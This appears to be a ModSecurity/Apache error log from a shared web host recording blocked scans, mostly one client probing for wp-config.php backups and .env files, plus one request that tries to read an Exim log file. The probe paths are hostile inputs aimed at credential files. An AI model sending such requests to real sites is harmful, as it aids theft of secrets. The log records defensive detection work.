[Mon May 11 12:28:06.583588 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:32596] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGvNJkIEwRJMyDaV55bOgAAAUo"]
[Mon May 11 12:28:06.611237 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:32600] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php.disabled"] [unique_id "agGvNr4KNmD_mZ_vlf9GGAAAAEM"]
[Mon May 11 12:28:06.612544 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:32600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php.disabled"] [unique_id "agGvNr4KNmD_mZ_vlf9GGAAAAEM"]
[Mon May 11 12:28:08.062578 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:32600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGvNr4KNmD_mZ_vlf9GGAAAAEM"]
[Mon May 11 12:28:08.100246 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:32614] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.php2024"] [unique_id "agGvOJkIEwRJMyDaV55bPQAAAU4"]
[Mon May 11 12:28:08.102395 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:32614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.php2024"] [unique_id "agGvOJkIEwRJMyDaV55bPQAAAU4"]
[Mon May 11 12:28:09.602830 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:32614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGvOJkIEwRJMyDaV55bPQAAAU4"]
[Mon May 11 12:28:09.628033 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:32630] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php2024"] [unique_id "agGvOWS6k_SCYd1AVZq7aAAAARM"]
[Mon May 11 12:28:09.628417 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:32630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.php2024"] [unique_id "agGvOWS6k_SCYd1AVZq7aAAAARM"]
[Mon May 11 12:28:10.856486 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:32630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGvOWS6k_SCYd1AVZq7aAAAARM"]
[Mon May 11 12:28:45.897533 2026] [security2:error] [pid 1254179:tid 1254204] [client 129.211.172.249:35076] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.k06.fr"] [uri "/"] [unique_id "agGvXWS6k_SCYd1AVZq7lgAAARc"]
[Mon May 11 12:29:34.655243 2026] [:error] [pid 1254179:tid 1254190] [client 20.151.104.6:8656] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 12:30:11.761237 2026] [security2:error] [pid 1254133:tid 1254157] [client 216.73.216.110:50825] ModSecurity: Warning. Matched phrase "var/log/exim_paniclog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_paniclog found within ARGS:filesrc: /var/log/exim_paniclog-20260419.gz"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGvsxjZymfuKpjWXeiKiQAAANU"]
[Mon May 11 12:30:11.763783 2026] [security2:error] [pid 1254133:tid 1254157] [client 216.73.216.110:50825] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGvsxjZymfuKpjWXeiKiQAAANU"]
[Mon May 11 12:30:11.861463 2026] [security2:error] [pid 1254133:tid 1254157] [client 216.73.216.110:50825] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGvsxjZymfuKpjWXeiKiQAAANU"]
[Mon May 11 12:31:24.735990 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:39346] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /.config/wp-config.old.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.config/wp-config.old.~"] [unique_id "agGv_BjZymfuKpjWXeiK8wAAAMQ"]
[Mon May 11 12:31:24.736395 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:39346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.config/wp-config.old.~"] [unique_id "agGv_BjZymfuKpjWXeiK8wAAAMQ"]
[Mon May 11 12:31:26.950820 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:39346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGv_BjZymfuKpjWXeiK8wAAAMQ"]
[Mon May 11 12:31:26.977439 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:39360] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /.config/wp-config.old.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.config/wp-config.old.~"] [unique_id "agGv_r4KNmD_mZ_vlf9HXgAAAE4"]
[Mon May 11 12:31:26.978002 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:39360] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.config/wp-config.old.~"] [unique_id "agGv_r4KNmD_mZ_vlf9HXgAAAE4"]
[Mon May 11 12:31:28.183719 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:39360] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGv_r4KNmD_mZ_vlf9HXgAAAE4"]
[Mon May 11 12:31:28.206015 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:39370] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.backup~"] [unique_id "agGwAJkIEwRJMyDaV55cSQAAAU4"]
[Mon May 11 12:31:28.209428 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:39370] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.backup~"] [unique_id "agGwAJkIEwRJMyDaV55cSQAAAU4"]
[Mon May 11 12:31:29.361743 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:39370] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwAJkIEwRJMyDaV55cSQAAAU4"]
[Mon May 11 12:31:29.387601 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:39378] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.backup~"] [unique_id "agGwAb4KNmD_mZ_vlf9HYQAAAFU"]
[Mon May 11 12:31:29.391991 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:39378] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.backup~"] [unique_id "agGwAb4KNmD_mZ_vlf9HYQAAAFU"]
[Mon May 11 12:31:30.599348 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:39378] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwAb4KNmD_mZ_vlf9HYQAAAFU"]
[Mon May 11 12:31:30.624859 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:39388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.debug~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.debug~"] [unique_id "agGwAr4KNmD_mZ_vlf9HYgAAAEA"]
[Mon May 11 12:31:30.625054 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:39388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.debug~"] [unique_id "agGwAr4KNmD_mZ_vlf9HYgAAAEA"]
[Mon May 11 12:31:31.790594 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:39388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwAr4KNmD_mZ_vlf9HYgAAAEA"]
[Mon May 11 12:31:31.813019 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:39402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.debug~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.debug~"] [unique_id "agGwA74KNmD_mZ_vlf9HZAAAAEs"]
[Mon May 11 12:31:31.813555 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:39402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.debug~"] [unique_id "agGwA74KNmD_mZ_vlf9HZAAAAEs"]
[Mon May 11 12:31:33.022670 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:39402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwA74KNmD_mZ_vlf9HZAAAAEs"]
[Mon May 11 12:31:33.049831 2026] [security2:error] [pid 1254212:tid 1254214] [client 185.177.72.9:39412] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.live.~"] [unique_id "agGwBUYQeUtAPynIs6xnCgAAAAA"]
[Mon May 11 12:31:33.050383 2026] [security2:error] [pid 1254212:tid 1254214] [client 185.177.72.9:39412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.live.~"] [unique_id "agGwBUYQeUtAPynIs6xnCgAAAAA"]
[Mon May 11 12:31:34.216547 2026] [security2:error] [pid 1254212:tid 1254214] [client 185.177.72.9:39412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwBUYQeUtAPynIs6xnCgAAAAA"]
[Mon May 11 12:31:34.243060 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:25828] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.live.~"] [unique_id "agGwBhjZymfuKpjWXeiK_AAAAME"]
[Mon May 11 12:31:34.243268 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:25828] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.live.~"] [unique_id "agGwBhjZymfuKpjWXeiK_AAAAME"]
[Mon May 11 12:31:36.469229 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:25828] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwBhjZymfuKpjWXeiK_AAAAME"]
